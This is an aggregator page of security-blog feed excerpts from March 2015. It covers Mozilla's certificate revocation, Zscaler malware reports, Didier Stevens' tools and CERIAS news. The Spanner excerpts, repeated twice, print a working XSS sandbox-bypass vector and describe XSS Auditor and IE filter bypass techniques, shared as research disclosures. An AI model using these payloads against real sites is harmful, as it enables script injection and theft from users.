Web App Security

  • Most Topular Stories

  • Revoking Trust in one CNNIC Intermediate Certificate

    Mozilla Security Blog
    kwilson
    23 Mar 2015 | 3:23 pm
    Mozilla was recently notified that an intermediate certificate, which chains up to a root included in Mozilla’s root store, was loaded into a firewall device that performed SSL man-in-the-middle (MITM) traffic management. It was then used, during the process of inspecting traffic, to generate certificates for domains the device owner does not legitimately own or control. The Certificate Authority (CA) has told us that this action was not permitted by their policies and practices and the agreement with their customer, and they have revoked the intermediate certificate that was loaded into…
  • RSA’s Move to Ban Booth Babes

    Liquidmatrix Security Digest
    Bill Brenner
    26 Mar 2015 | 3:33 am
    The language above has been added to exhibitor contracts for RSA Conference 2015. Zenobia Godschalk, a communications practitioner in the security industry and vocal critic of so-called “booth babes” at conferences like RSA and Black Hat, dropped me a line to say RSA added the language to force vendors to stop with the skimpy clothing. It appears the years of blowback over booth babes has had an affect, at least in RSA’s case. In an email, Zenobia said, “We are thrilled to report that RSA has actually changed their language in their vendor agreements this year! It now…
  • March Madness Ads, Scams, and Malware

    Zscaler Research
    Ed Miles
    20 Mar 2015 | 5:00 pm
    Introduction March Madness is officially upon us, with the last games of the round of 64 taking place today. As is usual with events that have such a level of interest, bad actors across the internet will be trying to get their cut of the action through topical spam advertising and phishing as well as search engine poisoning to draw ad revenue and in some cases, deliver malicious software.
  • MentalJS DOM bypass

    The Spanner
    Gareth Heyes
    6 Mar 2015 | 1:16 pm
    Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:- _=document x =_.createElement('script'); s =_.createElement('style') s.innerHTML = '*/alert(location)//' t=_.createElement('b') t.textContent = '/*' x.insertBefore(t.firstChild, null); x.insertBefore(s, null) _.body.appendChild(x) x =_.createElement('script'); s =_.createElement('style') s.innerHTML = _.getElementsByTagName('script')[2].textContent x.insertBefore(s.firstChild,…
  • What do you want from your DevTools?

    Mozilla Hacks - the Web developer blog
    Dan Callahan
    26 Mar 2015 | 7:47 am
    Every tool starts with an idea: “if I had this, then I could do that faster, better, or more easily.” The Firefox Developer Tools are built atop hundreds of those ideas, and many of them come from people in the web development community just like you. We collect those ideas in our UserVoice forum, and use your votes to help prioritize our work. Last April, @hopefulcyborg requested the ability to “Connect Firefox Developer Tools to [Insert Browser Here].” The following November, we launched Firefox Developer Edition which includes a preliminary version of just that: the…
  • add this feed to my.Alltop

    Mozilla Security Blog

  • Revoking Trust in one CNNIC Intermediate Certificate

    kwilson
    23 Mar 2015 | 3:23 pm
    Mozilla was recently notified that an intermediate certificate, which chains up to a root included in Mozilla’s root store, was loaded into a firewall device that performed SSL man-in-the-middle (MITM) traffic management. It was then used, during the process of inspecting traffic, to generate certificates for domains the device owner does not legitimately own or control. The Certificate Authority (CA) has told us that this action was not permitted by their policies and practices and the agreement with their customer, and they have revoked the intermediate certificate that was loaded into…
  • Introducing Masche: memory scanning for server security

    Julien Vehent
    12 Mar 2015 | 1:34 pm
    Mozilla operates thousands of servers to build products and run services for our users. Keeping these servers secure is the primary concern of the Operations Security team, and the reason why we have built Mozilla InvestiGator (MIG), a cross-platform endpoint security system. MIG can inspect the file system and network information of thousands of hosts in parallel, which greatly helps increase visibility across the infrastructure. But until recently, it lacked the ability to look into the memory of running processes, a need that often arises during security investigations. This is where…
  • Revoking Intermediate Certificates: Introducing OneCRL

    mgoodwin
    3 Mar 2015 | 2:06 pm
    Users of Firefox from Firefox 37 will be protected by a new feature called OneCRL. This is a new mechanism we have introduced to push lists of revoked intermediate certificates to the browser. Using OCSP for certificate revocation doesn’t serve users very well. For online revocation checks, either you have a system that fails open or you accept the performance penalty of checks that are more strict (as is the case for EV certificates). OCSP stapling can remove the need for live revocation checks, but currently, only only around 9% of TLS connections use it. OneCRL helps speed up revocation…
  • Getting Superfish out of Firefox

    rbarnes
    27 Feb 2015 | 1:15 pm
    First things first: If you are reading this post on a recent Lenovo laptop, please click the lock icon in the URL bar, then click “More Information…”.  If you see “Verified by: Superfish, Inc.”, you are infected with Superfish, and you should follow these instructions to remove it. The Superfish adware distributed by Lenovo has brought the issue of SSL interception back to the headlines.  SSL interception is a technique that allows other software on a user’s computer to monitor and control their visits to secure Web sites — however, it also enables attackers to masquerade…
  • MWoS – Audit-Go

    gdestuynder
    20 Feb 2015 | 1:14 pm
    The Mozilla Winter of Security of last year is concluding and the participating teams of students are completing their projects. Our first team has completed the Audit-Go Heka plugin project recently with great success. The Audit-Go plugin is a native Go implementation of a Linux Audit client. It communicates with the kernel using the Netlink protocol and has no extra dependencies. The MWoS team and myself would like to thank our students Hardik Juneja, Arun Sori, Aalekh Nigam and their professor Sanjay Goel from the Jaypee Institute of Information Technology for their work and partnership…
 
  • add this feed to my.Alltop

    Liquidmatrix Security Digest

  • RSA’s Move to Ban Booth Babes

    Bill Brenner
    26 Mar 2015 | 3:33 am
    The language above has been added to exhibitor contracts for RSA Conference 2015. Zenobia Godschalk, a communications practitioner in the security industry and vocal critic of so-called “booth babes” at conferences like RSA and Black Hat, dropped me a line to say RSA added the language to force vendors to stop with the skimpy clothing. It appears the years of blowback over booth babes has had an affect, at least in RSA’s case. In an email, Zenobia said, “We are thrilled to report that RSA has actually changed their language in their vendor agreements this year! It now…
  • What “Hug-Gate” Says About The Infosec Community

    Bill Brenner
    23 Mar 2015 | 4:07 am
    Every once in awhile, someone in the security community says something on Twitter that ignites emotional discussion (some call it drama). This past weekend, it started with a comment about hugs. Someone commented that some security cons involve a lot of hugging and that it makes her uncomfortable. Someone responded with a comment about the benefits of hugs. Then all hell broke loose. Why, the first person asked, do people get offended for not wanting hugs at these events? After all, isn’t it well proven that our industry is loaded with people who suffer from social disorders? Some…
  • Reflections

    Dave Lewis
    8 Mar 2015 | 7:36 pm
    I find myself sitting in a hotel room in some random city this evening with a glass of wine, several open powerpoint decks and Family Guy on the television. A moment of reflection if ever there was one. It occurs to me that Liquidmatrix just had it’s 17th birthday in February. That is a helluva long time for a website of any description. It has been a lot of fun to see the site grow from an insanely (ugly) basic HTML site to a heavily trafficked site with multiple members either writing or podcasting. I’ve been making a lot of architectural changes to the site and now, I’m going to…
  • A Failed Hacker Unmasking Exercise

    Bill Brenner
    10 Feb 2015 | 5:26 am
    “A ridiculous article which purports to show us the face of a hacker…” — Chris Wysopal, CTO of Veracode, in a tweet The ability of media outlets to create sophisticated images and graphics is light years beyond what it was when I was a young journalist in the 1990s. The technology has spawned a lot of cool projects, like this visual of a botnet from my former employer, CSOonline.com. The enhanced capability also leads to some truly ridiculous creations. For example, this Secure Thoughts piece on “hackers unmasked.” The writer asks, “Who are the…
  • New Adobe Flash Vulnerability – CVE-2015-0313

    Bill Brenner
    3 Feb 2015 | 6:10 am
    Oh, joy. Adobe has put out yet another security bulletin for vulnerabilities in Flash.  Details: Security Advisory for Adobe Flash Player Release date: February 2, 2015 Vulnerability identifier: APSA15-02 CVE number: CVE-2015-0313 Platform: All Platforms Summary A critical vulnerability (CVE-2015-0313) exists in Adobe Flash Player 16.0.0.296 and earlier versions for Windows and Macintosh.  Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. We are aware of reports that this vulnerability is being actively exploited in…
  • add this feed to my.Alltop

    Zscaler Research

  • March Madness Ads, Scams, and Malware

    Ed Miles
    20 Mar 2015 | 5:00 pm
    Introduction March Madness is officially upon us, with the last games of the round of 64 taking place today. As is usual with events that have such a level of interest, bad actors across the internet will be trying to get their cut of the action through topical spam advertising and phishing as well as search engine poisoning to draw ad revenue and in some cases, deliver malicious software.
  • njRAT & H-Worm variant infections continue to rise

    Deepen Desai
    20 Mar 2015 | 8:46 am
    Introduction njRAT Trojan also known as Bladabindi, is a Remote Access Tool (RAT) that was first seen in 2013 and has been extremely prevalent in the Middle Eastern region. njRAT was developed using Microsoft's .NET framework and like many other RATs, provides complete control of the infected system and delivers an array of features to the remote attacker. We have seen attackers leveraging 
  • Mobile App Wall of Shame: Shaadi.com

    viral
    17 Mar 2015 | 11:30 am
    Shaadi.com Price : Free Category : Social Platform : iOS and Android Updated : Mar. 9, 2015 (Android), Mar. 10 2015 (iOS) Version : 4.2.2 (Android), 4.2.1 (iOS) Size : 8.28 MB (Android), 17.7 MB (iOS) Language : English Vendor : People Interactive (I) Pvt. Ltd. Background: Shaadi.com is the world's largest matrimonial website, active since 1995. This matrimonial site permits individuals to
  • Malvertising targeting European transit users

    Chris Mannon
    11 Mar 2015 | 4:14 pm
    Malvertising has been an active and growing attack vector for delivering malicious payloads to unsuspecting users. ThreatLabZ recently uncovered a malvertising campaign targeting European transit users and the end payload appears to be downloading the KINS Zeus variant. The KINS (Kasper Internet Non-Security) variant of Zeus is a banking Trojan that has been prevalent since 2011. KINS is a
  • Mobile App Wall of Shame: Quikr

    viral
    6 Mar 2015 | 10:30 am
    Quikr Local Classifieds Quikr app logo  Price : Free Category : Lifestyle/Shopping Platform : iOS and Android Updated : February 12, 2015(Android), 22 January 2015(iOS)  Version : 7.42(Android), 2.8.2(iOS) Size : 3.89 MB(Android),10 MB(iOS) Language : English Vendor : Quikr India Background: Quikr is India's largest online and mobile classifieds portal. Like Craigslist, Quikr
 
  • add this feed to my.Alltop

    The Spanner

  • MentalJS DOM bypass

    Gareth Heyes
    6 Mar 2015 | 1:16 pm
    Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:- _=document x =_.createElement('script'); s =_.createElement('style') s.innerHTML = '*/alert(location)//' t=_.createElement('b') t.textContent = '/*' x.insertBefore(t.firstChild, null); x.insertBefore(s, null) _.body.appendChild(x) x =_.createElement('script'); s =_.createElement('style') s.innerHTML = _.getElementsByTagName('script')[2].textContent x.insertBefore(s.firstChild,…
  • Another XSS auditor bypass

    Gareth Heyes
    19 Feb 2015 | 11:50 am
    This bug is similar to the last one I posted but executes in a different context. It requires an existing script after the injection because we use it to close the injected script. It’s a shame chrome doesn’t support self closing scripts in HTML or within a SVG element because I’m pretty sure I could bypass it without using an existing script. Anyway the injection uses a data url with a script. In order to bypass the filter we need to concat the string with the quote from the attribute or use html entities such as //. The HTML parser doesn’t care how…
  • XSS Auditor bypass

    Gareth Heyes
    10 Feb 2015 | 11:56 am
    XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML…
  • Bypassing the IE XSS filter

    Gareth Heyes
    7 Jan 2015 | 1:06 pm
    Mario noticed that the new version of the IE filter blocks anchors in attempt to prevent the same origin bypass where you double encode the vector and post a link to itself. I had to take a look and see if I could break it and…of course I did. The regex is very generic:- <a.*?hr{e}f This could cause problems with information disclosure if you can put something in between the “a” and “href” and detect if the filter is active which I’ll admit is pretty tricky now with the new protection against such attacks. Anyway lets move onto the vectors. I literally…
  • Unbreakable filter

    Gareth Heyes
    24 Oct 2014 | 2:13 pm
    I was bored so I thought I’d take a look at Ashar’s filters. I noticed he’d done a talk about it at Blackhat Europe which I was quite surprised at. Then I came across the following blog post about the talk which I pretty much agreed with. That blog post links to his filters so you can try them out yourself. The first one is basically multiple JavaScript regexes which are far too generic to be of any value. For example “hahasrchaha” is considered a valid attack =) because it has “src” in. I’m not joking. The regexes are below. function…
  • add this feed to my.Alltop

    Mozilla Hacks - the Web developer blog

  • What do you want from your DevTools?

    Dan Callahan
    26 Mar 2015 | 7:47 am
    Every tool starts with an idea: “if I had this, then I could do that faster, better, or more easily.” The Firefox Developer Tools are built atop hundreds of those ideas, and many of them come from people in the web development community just like you. We collect those ideas in our UserVoice forum, and use your votes to help prioritize our work. Last April, @hopefulcyborg requested the ability to “Connect Firefox Developer Tools to [Insert Browser Here].” The following November, we launched Firefox Developer Edition which includes a preliminary version of just that: the…
  • WebRTC in Firefox 38: Multistream and renegotiation

    Nils Ohlmeier
    25 Mar 2015 | 7:28 am
    Building on the JSEP (Javascript Session Establishment Protocol) engine rewrite introduced in 37, Firefox 38 now has support for multistream (multiple tracks of the same type in a single PeerConnection), and renegotiation (multiple offer/answer exchanges in a single PeerConnection). As usual with such things, there are caveats and limitations, but the functionality seems to be pretty solid. Multistream and renegotiation features Why are these things useful, you ask? For example, now you can handle a group video call with a single PeerConnection (multistream), and do things like add/remove…
  • Understanding the CSS box model for inline elements

    pbrosset
    24 Mar 2015 | 8:26 am
    In a web page, every element is rendered as a rectangular box. The box model describes how the element’s content, padding, border, and margin determine the space occupied by the element and its relation to other elements in the page. Depending on the element’s display property, its box may be one of two types: a block box or an inline box. The box model is applied differently to these two types. In this article we’ll see how the box model is applied to inline boxes, and how a new feature in the Firefox Developer Tools can help you visualize the box model for inline elements.
  • How to make a browser app for Firefox OS

    yliao
    20 Mar 2015 | 10:47 am
    Firefox OS is an operating system built on top of the Firefox web browser engine, which is called Gecko. A browser app on Firefox OS provides a user interface written with HTML5 technology and manages web page browsing using the Browser API. It also manages tabbing, browsing history, bookmarks, and so on depending on the implementation. While Firefox OS already includes a browser, you can use the browser API to create your own browser or add browser functionality to your app. This article shows you how to build a browser app for Firefox OS devices. Following the steps, you’ll get a…
  • Using the Firefox DevTools to Debug fetch() on GitHub

    Dan Callahan
    19 Mar 2015 | 11:45 am
    Firefox Nightly recently added preliminary support for Fetch, a modern, Promise-based replacement for XMLHttpRequest (XHR). Our initial work supported most of the Fetch Specification, but not quite all of it. Specifically, when Fetch first appeared in Nightly, we hadn’t yet implemented serializing and de-serializing of FormData objects. GitHub was already using Fetch in production with a home-grown polyfill, and required support for serializing FormData in order to upload images to GitHub Issues. Thus, when our early, incomplete implementation of Fetch landed in Nightly, the GitHub…
 
  • add this feed to my.Alltop

    Didier Stevens

  • Howto: Make Your Own Cert With OpenSSL on Windows

    Didier Stevens
    29 Mar 2015 | 5:00 pm
    Some people following my “Howto: Make Your Own Cert With OpenSSL” do this on Windows and some of them encounter problems. So this post shows the procedure on Windows. For your info: I also have a video showing this howto. First of all, on Windows you will need to install OpenSLL from binaries. I got these binaries. I installed the latest version (v1.0.2a) and choose the 32-bit version (Win32). I choose the 32-bit version because this will work for every Windows machine: the 32-bit version works on 32-bit and 64-bit machines. If you start the installation and get the following…
  • oledump And XML With Embedded OLE Object

    Didier Stevens
    26 Mar 2015 | 5:00 pm
    I updated oledump to handle a new type of malicious document: an XML file, not with VBA macros, but with an embedded OLE object that is a VBS file. And the man page is finished. Run oledump.py -m to view the man page. The sample I’m using here is 078409755.doc (B28EF236D901A96CFEFF9A70562C9155). The extension is .doc, but it is an XML file, not an OLE file. First check: The XML file contains an OLE file with 1 stream. Let’s take a look inside the stream: Byte 0x78 could be the start of a ZLIB compressed data stream. Let’s checks this with option –decompress: It is…
  • split.py

    Didier Stevens
    22 Mar 2015 | 5:00 pm
    Split is a Python program to split text files into several parts. Usage: split.py [options] file Split a text file into X number of files (2 by default) Options: –version             show program’s version number and exit -h, –help            show this help message and exit -m, –man             Print manual -p PARTS, –parts=PARTS Number of parts to split the file into Manual: This program will split the given text file in 2 parts (2 parts by default, the number of parts can be changed with option -p). Each resulting file has…
  • Update: peid-userdb-to-yara-rules.py

    Didier Stevens
    17 Mar 2015 | 5:00 pm
    Just some small changes. peid-userdb-to-yara-rules_V0_0_2.zip (https) MD5: BE287BE1CB4EAFC360B1105C47F81819 SHA256: DC673DC90420F880EBDC8A0298410B3B8D90AFBCCE868A3E075DB5AAF898A188
  • Update oledump.py Version 0.0.12

    Didier Stevens
    16 Mar 2015 | 5:00 pm
    This update adds support for metadata and fixes an XML parsing bug. oledump_V0_0_12.zip (https) MD5: 0AB5F77A9C0F1FF3E8BE4F675440A875 SHA256: 6F87E65729B5A921079B9E5400F63BE6721673B7AC075D809B643074B47FB8D3
  • add this feed to my.Alltop

    CERIAS Combined Feed

  • Ch-ch-ch-changes

    Gene Spafford
    24 Mar 2015 | 1:32 pm
    Earlier today (March 24), Dean Jeff Roberts released this memo to CERIAS faculty and staff. The quick summary of that memo is that the Dean will not reappoint Professor Spafford as Executive Director of CERIAS for another term. This is not for cause — Dean Roberts has implied it is simply because Spaf has been in that position for so long. This action is not something Professor Spafford solicited, nor does he agree with the methodology or timing of the decision. Professor Spafford has been asked to meet with the Provost about this issue, and will postpone issuing any response until after…
  • Indiana to Launch New IN-ISAC and Enhance Cyberdefense Programs

    CERIAS Webmaster
    10 Feb 2015 | 9:34 am
    Unique Indiana state government partnership with Purdue University will also utilize private-sector expertise to defend state networks from next-generation cyberattacks. This breaking news demonstrates that cyberdefense is a top priority for Indiana Gov. Mike Pence. More information »
  • Cybersecurity Issue Goes Beyond the Anthem Headlines

    CERIAS Webmaster
    7 Feb 2015 | 5:46 am
    (Phys.Org) Eugene Spafford, the executive director of Purdue’s Center for Education and Research in Information Assurance and Security, says in the case of Anthem and others, the costs and dangers are hidden. “The personal information they listed can represent a problem for people for years to come,” he said. “That’s information that can be used for identity theft, extortion and to gain people’s trust. So, it really is a big problem, even if medical or credit card information is not given out. The company providing a year or two of credit monitoring won’t fix that.” More…
  • Not so Easy to Buy Privacy: Study Shows How ‘Anonymized’ Credit Card Data Still Identifies

    CERIAS Webmaster
    30 Jan 2015 | 11:26 am
    The study shows that when we think we have privacy when our data is collected, it’s really just an “illusion,” said Eugene Spafford, director of Purdue University’s Center for Education and Research in Information Assurance and Security. Spafford, who wasn’t part of the study, said it makes “one wonder what our expectation of privacy should be anymore.” More information »
  • North Korea’s Internet Outage Was Likely the Work of Hacktivists (The Washington Post)

    CERIAS Webmaster
    23 Dec 2014 | 12:34 pm
    “If the government wanted to do something about this, I would suspect they would do something more targeted toward the leadership rather than just shutting down the network,” said Eugene Spafford, a professor of information security at Purdue University. “Teenagers with botnets regularly shut down networks.” Targeting the financial assets of North Korean leaders (rather than the country’s Internet equipment) would be much more closely aligned with President Obama’s warning of a “proportional response” — and something the White House could accomplish that nameless hacktivists…
  • add this feed to my.Alltop

    Security Bloggers Network

  • Security Slice: Apple Watch Worries

    Eva Hanscom
    29 Mar 2015 | 8:00 pm
    Apple’s latest device is set to hit store shelves on April 24. The Apple Watch is already a hot ticket item but security experts are worried about key features. Should consumers worry about Apple Watch security? Listen to our latest security slice podcast and hear Tim Erlin, Lamar Bailey and Tyler Reguly discuss why smart watches […]… Read More The post Security Slice: Apple Watch Worries appeared first on The State of Security.
  • British Airways confirms frequent flyer hack

    ZDNet &#124; Zero Day RSS
    29 Mar 2015 | 7:28 pm
    The airline has confirmed thousands of frequent flyer accounts have been accessed.
  • Group Policy Alternatives: Part 1

    Windows IT Pro
    29 Mar 2015 | 7:20 pm
    Orin Thomas When group policy debuted 15 years ago, most organizational computers were desk bound in offices. Today’s computers are different, and so is the manner in which organizations manage their configuration. read more
  • SBN Sponsor Post

    Kevin Riggins
    29 Mar 2015 | 7:00 pm
  • GitHub suffers ‘largest DDoS’ attack in site’s history

    ZDNet &#124; Zero Day RSS
    29 Mar 2015 | 6:43 pm
    US coding website GitHub is fending off a DDoS onslaught focused on shutting down anticensorship tools.
 
  • add this feed to my.Alltop

    blog.hotspotshield.com

  • New movies coming out in April on Netflix

    Jeanette
    29 Mar 2015 | 9:10 am
    It’s a new month, so get ready for a slew of new movies to watch on Netflix. Here are some movies we’re excited to watch on Netflix: Barnyard An animated family movie about farm animals coming out to play while the farmer’s gone away.   Bound A pair of women who fall in love conspire to steal from the mob.   The Crocodile Hunter: Collision Course Watch the famous Crocodile Hunter Steve Irwin go on an animal-filled adventure in the wild.   Down to Earth Chris Rock stars in this comedy as a failing comedian who dies and then is given a second chance to live, but in…
  • 6 Simple Ways to Protect Your Twitter Account from Hackers

    Levent Sapci
    27 Mar 2015 | 9:16 am
    Twitter hacks are far from an uncommon occurrence. Users ranging from major news media outlets to A-list celebrities have suffered the effects of unscrupulous hackers. Depending on the nature of the hack, the effects can range from annoying to disastrous. While there are ways you can recover from a Twitter hack, a far better tactic is to protect yourself from the hack to begin with. These smart steps will help you stay safe on this popular social media site. 1. Create a Strong Password This may seem obvious, but weak passwords still exist, and they create easy openings for hackers. Strong…
  • Top Netflix Movies to Watch Based on Your Mood Before They Are Gone in April

    Levent Sapci
    24 Mar 2015 | 1:05 pm
    It could happen to anyone. Every time you access your Netflix account, you see an interesting movie but don’t feel like watching right away. It’ll still be there another day. When you finally decide to watch it, however, it is gone. It has left Netflix US and slipped into cyberspace oblivion. Your entertainment options don’t have to stay at the mercy of Netflix’s whims. Learn ahead of time when certain movies and shows will expire from the streaming service, and watch them before they’re gone. Here a few titles that will say goodbye to Netflix in April, so throw…
  • How to Watch the Live Streaming Of 2015 Formula 1 Races from any country

    Peter Nguyen
    23 Mar 2015 | 3:30 pm
    I first saw a Formula 1 race when it was held in downtown San Jose in 2007. The sight of the roaring Formula 1 cars zipping down the street sent a rush of excitement through every nerve on my body. After that experience, I was hooked! The 2015 Formula 1 season just started and I am super excited. Twenty drivers from ten teams will compete for the World Drivers’ and Word Constructors’ Championships, starting in Australia on March 15th and ending in Abu Dhabi on November 29th. Of course, most of us would rather watch the races live. Since it’s not possible, the next best option is to…
  • AnchorFree CEO David Gorodyansky Supporting Online Privacy at SXSW 2015

    Levent Sapci
    22 Mar 2015 | 9:15 am
    This March, our very own David Gorodyansky presented a panel discussion at the 2015 SXSW Interactive Festival in Austin, Texas. Gorodyansky co-founded AnchorFree at the age of 23 with a single mission in mind: to make Internet freedom and privacy a reality for every computer user on the planet. As CEO, Gorodyansky nurtured AnchorFree from its seedling stage to the thriving business it is today. Hotspot Shield products protect over 300 million customers daily. Every month, six million new customers join the Hotspot Shield family. At SXSW, Gorodyansky addressed core issues that affect all…
Log in